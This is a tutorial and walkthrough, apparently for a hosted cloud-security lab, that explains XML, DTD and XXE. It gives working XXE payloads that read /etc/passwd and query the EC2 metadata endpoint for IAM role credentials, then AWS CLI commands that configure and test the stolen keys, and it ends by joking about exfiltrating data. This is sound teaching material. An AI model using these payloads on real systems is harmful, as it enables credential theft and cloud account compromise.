Before we jump into the lab and start breaking things (ethically 😄🔧), let’s grab a few quick building blocks. We’ll first understand XML, DTD, and XXE with simple examples, so when the exploit chain shows up in the demo, it won’t feel like magic… it’ll feel like “yep, that checks out” ✅🧠
What is XML? 🧾 (a.k.a. “data wearing a tie”)
XML (eXtensible Markup Language) is just a way to store and send data using tags.
Think of it like a lunchbox with labeled compartments 🍱: <name>, <price>, <level>, etc.
✅ Simple XML example (normal, well-behaved)
<player>
<name>Neo</name>
<level>7</level>
<power>Invisibility</power>
</player>
What’s happening here? 🧠
- <player> is the outer container (like a folder 📁)
- Inside it are fields like <name>, <level>, <power>
- It’s structured, readable, and boring (in a good way) 😄
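To see those labeled compartments from code, here is a minimal sketch that parses the same document and reads each field 🐍 It assumes Python and its standard-library xml.etree.ElementTree module, which this post doesn't otherwise use; the variable names are ours.

```python
import xml.etree.ElementTree as ET

# The same well-behaved document from the example above.
PLAYER_XML = """
<player>
  <name>Neo</name>
  <level>7</level>
  <power>Invisibility</power>
</player>
""".strip()

root = ET.fromstring(PLAYER_XML)  # the root element is <player>

# Each child tag is one labeled compartment of the lunchbox.
player = {child.tag: child.text for child in root}

print(root.tag)  # player
print(player)    # {'name': 'Neo', 'level': '7', 'power': 'Invisibility'}
```

Note that every value comes back as text; turning "7" into a number is the application's job, not XML's.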
What is a DTD? 📜 (the “rulebook” + “macro sheet” for XML)
DTD (Document Type Definition) is like the XML document’s instruction manual.
It can define:
- what tags are allowed ✅
- and something spicier: entities (like variables/macros) 🎭
🧩 DTD with an entity (safe-ish)
<!DOCTYPE player [
<!ENTITY cheat "GODMODE">
]>
<player>
<name>Neo</name>
<code>&cheat;</code>
</player>
What’s happening? 🎬
- <!DOCTYPE player [...]> says: “Here comes the rulebook”
- <!ENTITY cheat "GODMODE"> defines a shortcut:
  - whenever the parser sees &cheat;, it replaces it with "GODMODE" 🎮
So the output basically becomes: GODMODE
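You can watch that substitution happen with a tiny sketch 🎮 It assumes Python's standard-library xml.etree.ElementTree as the parser (our pick for illustration; other parsers may behave differently), which expands internal entities declared in the document's own DTD.

```python
import xml.etree.ElementTree as ET

# The document from above: one internal entity, then a reference to it.
DOC = """<!DOCTYPE player [
  <!ENTITY cheat "GODMODE">
]>
<player>
  <name>Neo</name>
  <code>&cheat;</code>
</player>"""

root = ET.fromstring(DOC)

# By the time we read <code>, the parser has already swapped &cheat; out.
code_text = root.findtext("code")
print(code_text)  # GODMODE
```

The application never sees &cheat; at all; it only sees the expanded text. That detail is what makes the external flavour of entities risky.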
What is XXE? 🐍 (XML External Entity… the sneaky one)
XXE happens when the XML parser is allowed to load external entities.
Meaning: the attacker can say:
“Hey parser… when you see &something;, go fetch it from somewhere else 😈”
That “somewhere else” could be:
- a file on your server 📁 (/etc/passwd)
- an internal URL 🌐 (SSRF)
- cloud metadata 🧠☁️ (169.254.169.254)
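Those three destinations can be told apart just by looking at the URI an entity points to. Here is a rough sketch of that triage in Python 🔍 The helper classify_target and its labels are hypothetical names made up for this post, and the rules are deliberately simplified.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_target(system_uri):
    """Roughly label what an external entity's SYSTEM URI points at."""
    parts = urlsplit(system_uri)
    if parts.scheme == "file":
        return "local file"
    if parts.scheme in ("http", "https"):
        try:
            ip = ipaddress.ip_address(parts.hostname or "")
        except ValueError:
            return "URL by hostname"  # a DNS name, not a literal IP
        if ip.is_link_local:
            # 169.254.0.0/16 is link-local; cloud metadata services live here.
            return "link-local (cloud metadata range)"
        if ip.is_private or ip.is_loopback:
            return "internal URL"
        return "external URL"
    return "other"


for uri in (
    "file:///etc/passwd",
    "http://10.0.0.5/admin",
    "http://169.254.169.254/latest/meta-data/",
):
    print(uri, "->", classify_target(uri))
```

The link-local check runs before the private check on purpose, since Python's ipaddress module also counts 169.254.0.0/16 as private.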
😇 A normal entity (safe)
<!DOCTYPE player [
<!ENTITY snack "🍕">
]>
<player>
<name>Neo</name>
<reward>&snack;</reward>
</player>
😈 XXE example (external entity)
This makes the server try to read a local file (classic demo):
<!DOCTYPE player [
<!ENTITY secret SYSTEM "file:///etc/passwd">
]>
<player>
<name>Neo</name>
<reward>&secret;</reward>
</player>
What’s happening? 💥
- SYSTEM "file:///etc/passwd" tells the parser: “Go read this file from the server and paste it here.”
- If the parser allows it, your response may include file contents 😬
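That “if the parser allows it” part matters a lot. As a contrast, here is a small sketch using Python's standard-library xml.etree.ElementTree (our choice for illustration, not what the lab runs). Per the Python documentation, this parser does not expand external entities and raises a ParseError when it meets one. The helper try_parse is a hypothetical name.

```python
import xml.etree.ElementTree as ET

# The XXE document from above, unchanged.
XXE_DOC = """<!DOCTYPE player [
  <!ENTITY secret SYSTEM "file:///etc/passwd">
]>
<player>
  <name>Neo</name>
  <reward>&secret;</reward>
</player>"""


def try_parse(doc):
    """Parse the document and report whether the parser accepted it."""
    try:
        root = ET.fromstring(doc)
    except ET.ParseError as exc:
        return f"rejected: {exc}"
    return f"parsed: reward={root.findtext('reward')!r}"


result = try_parse(XXE_DOC)
print(result)
```

Here the file is never read. A parser configured to resolve external entities would behave very differently, and that is exactly the situation the lab simulates 😈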
Bonus: XXE that becomes SSRF 🚀 (cloud-lab friendly)
This turns XML into a “server-side browser” 🕷️
<!DOCTYPE player [
<!ENTITY meta SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<player>
<name>Neo</name>
<reward>&meta;</reward>
</player>
If vulnerable:
- the server fetches the URL
- and you get back internal metadata (hello, IMDSv1 👋)
Alright, warm-up’s done ✅🔥
Now it’s time to dive into the deep end, trace the attack path step-by-step, and see this whole thing in action in the lab 🧪🚀
1️⃣ Navigate to the web application vulnerable to XXE 🕸️. This is a simulation of a game where players can control the speed of the cycle on the right side. We need to abuse the speed and probably the entire game.
https://lab.5minutescloud.com/attack-path/aws/xxe-ssrf-lab
2️⃣ Click Execute with the default payload and analyse the output. This looks NORMAL ✅
<game>
<player>Player1</player>
<stats>
<speed>10</speed>
</stats>
</game>
3️⃣ Now run with <speed>100</speed>. This looks CHEAT ACTIVATED ✅
<game>
<player>Player1</player>
<stats>
<speed>100</speed>
</stats>
</game>
4️⃣ It’s time to break the GAME with the payload below, which tries to read a file from the server. If the file contents come back, the parser resolves external entities, so XXE to SSRF is worth trying next. This looks SYSTEM COMPROMISED 🚨
<!DOCTYPE foo [
<!ENTITY hack SYSTEM "file:///etc/passwd">
]>
<game>
<player>&hack;</player>
<stats>
<speed>10</speed>
</stats>
</game>
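The payload in this step and the ones in the next two steps differ only in the SYSTEM target, so they can be generated from one template. A minimal Python sketch 🧰 The function build_payload is a hypothetical helper of ours; the entity name, the XML layout and the role name XXE-SSRF-IAMROLE are taken from the lab payloads in this post.

```python
IMDS_ROLES = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def build_payload(target, entity="hack"):
    """Return the lab's XML payload with `target` as the external entity URI."""
    if '"' in target:
        # A double quote would end the SYSTEM literal early.
        raise ValueError("target must not contain a double quote")
    return "\n".join([
        "<!DOCTYPE foo [",
        f'<!ENTITY {entity} SYSTEM "{target}">',
        "]>",
        "<game>",
        f"<player>&{entity};</player>",
        "<stats>",
        "<speed>10</speed>",
        "</stats>",
        "</game>",
    ])


# Step 4 (local file), step 5 (role listing), step 6 (role credentials).
for target in (
    "file:///etc/passwd",
    IMDS_ROLES,
    IMDS_ROLES + "XXE-SSRF-IAMROLE/",
):
    print(build_payload(target), end="\n\n")
```

Only use payloads like these against the lab or systems you are authorised to test.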
5️⃣ Since our goal is to abuse the EC2 metadata [IMDSv1] endpoint, use the payload below with the endpoint [http://169.254.169.254/latest/meta-data/iam/security-credentials/] to extract the IAM role name. This role name will later help in fetching programmatic credentials 🛡️
<!DOCTYPE foo [
<!ENTITY hack SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<game>
<player>&hack;</player>
<stats>
<speed>10</speed>
</stats>
</game>
XXE-SSRF-IAMROLE
6️⃣ Given that the role name is XXE-SSRF-IAMROLE we can retrieve the credentials using the following payload with endpoint [http://169.254.169.254/latest/meta-data/iam/security-credentials/XXE-SSRF-IAMROLE/] 🛡️🔐
<!DOCTYPE foo [
<!ENTITY hack SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/XXE-SSRF-IAMROLE/">
]>
<game>
<player>&hack;</player>
<stats>
<speed>10</speed>
</stats>
</game>
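AccessKeyId, SecretAccessKey, and Token
7️⃣ Configure the AWS CLI using the retrieved AccessKeyId, SecretAccessKey, and Token 👀 The interactive aws configure prompt only asks for the access key and secret key (plus region and output format), so set the session token separately, replacing <Token> with the retrieved value:
aws configure --profile xxe-ssrf
aws configure set aws_session_token "<Token>" --profile xxe-ssrf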
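If you'd rather not copy three values by hand, a short Python sketch can turn the JSON returned by the metadata endpoint into non-interactive aws configure set commands ⚙️ The sample response below uses made-up placeholder values in the shape IMDS returns, and to_cli_commands is a hypothetical helper name. Temporary credentials need all three values, including the session token.

```python
import json
import shlex

# Placeholder response; every value here is fake.
IMDS_RESPONSE = """{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAEXAMPLEKEYID",
  "SecretAccessKey": "exampleSecretKey",
  "Token": "exampleSessionToken",
  "Expiration": "2030-01-01T00:00:00Z"
}"""

# IMDS field name -> AWS CLI configuration key.
CLI_KEYS = {
    "AccessKeyId": "aws_access_key_id",
    "SecretAccessKey": "aws_secret_access_key",
    "Token": "aws_session_token",
}


def to_cli_commands(raw_json, profile="xxe-ssrf"):
    """Build one `aws configure set` command per credential field."""
    creds = json.loads(raw_json)
    return [
        f"aws configure set {key} {shlex.quote(creds[field])} "
        f"--profile {shlex.quote(profile)}"
        for field, key in CLI_KEYS.items()
    ]


commands = to_cli_commands(IMDS_RESPONSE)
for command in commands:
    print(command)
```

These credentials are temporary, so expect them to stop working once the Expiration time passes.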
8️⃣ Time to check whether the credentials are working or not! ✅
aws sts get-caller-identity --profile xxe-ssrf
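If the credentials work, the command prints a small JSON document whose Arn field tells you which role you are now acting as. A quick Python sketch for pulling the role name out of it 🕵️ The sample output uses a made-up account ID and instance ID, and assumed_role_name is a hypothetical helper name.

```python
import json

# Placeholder output in the shape the command prints for instance-role
# credentials; the account ID and instance ID are invented.
SAMPLE_OUTPUT = """{
  "UserId": "AROAEXAMPLEID:i-0123456789abcdef0",
  "Account": "123456789012",
  "Arn": "arn:aws:sts::123456789012:assumed-role/XXE-SSRF-IAMROLE/i-0123456789abcdef0"
}"""


def assumed_role_name(identity_json):
    """Return the role name from an assumed-role ARN, or None otherwise."""
    arn = json.loads(identity_json)["Arn"]
    # ARN layout: arn:partition:service:region:account:resource
    resource = arn.split(":", 5)[5]
    kind, _, rest = resource.partition("/")
    if kind != "assumed-role":
        return None
    return rest.split("/")[0]


role = assumed_role_name(SAMPLE_OUTPUT)
print(role)  # XXE-SSRF-IAMROLE
```

Seeing the lab's role name here confirms that the stolen credentials belong to the EC2 instance role.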
🔐💀 “Access granted.” Time to exfiltrate the data like a pro… thank me later 🕶️💻🔥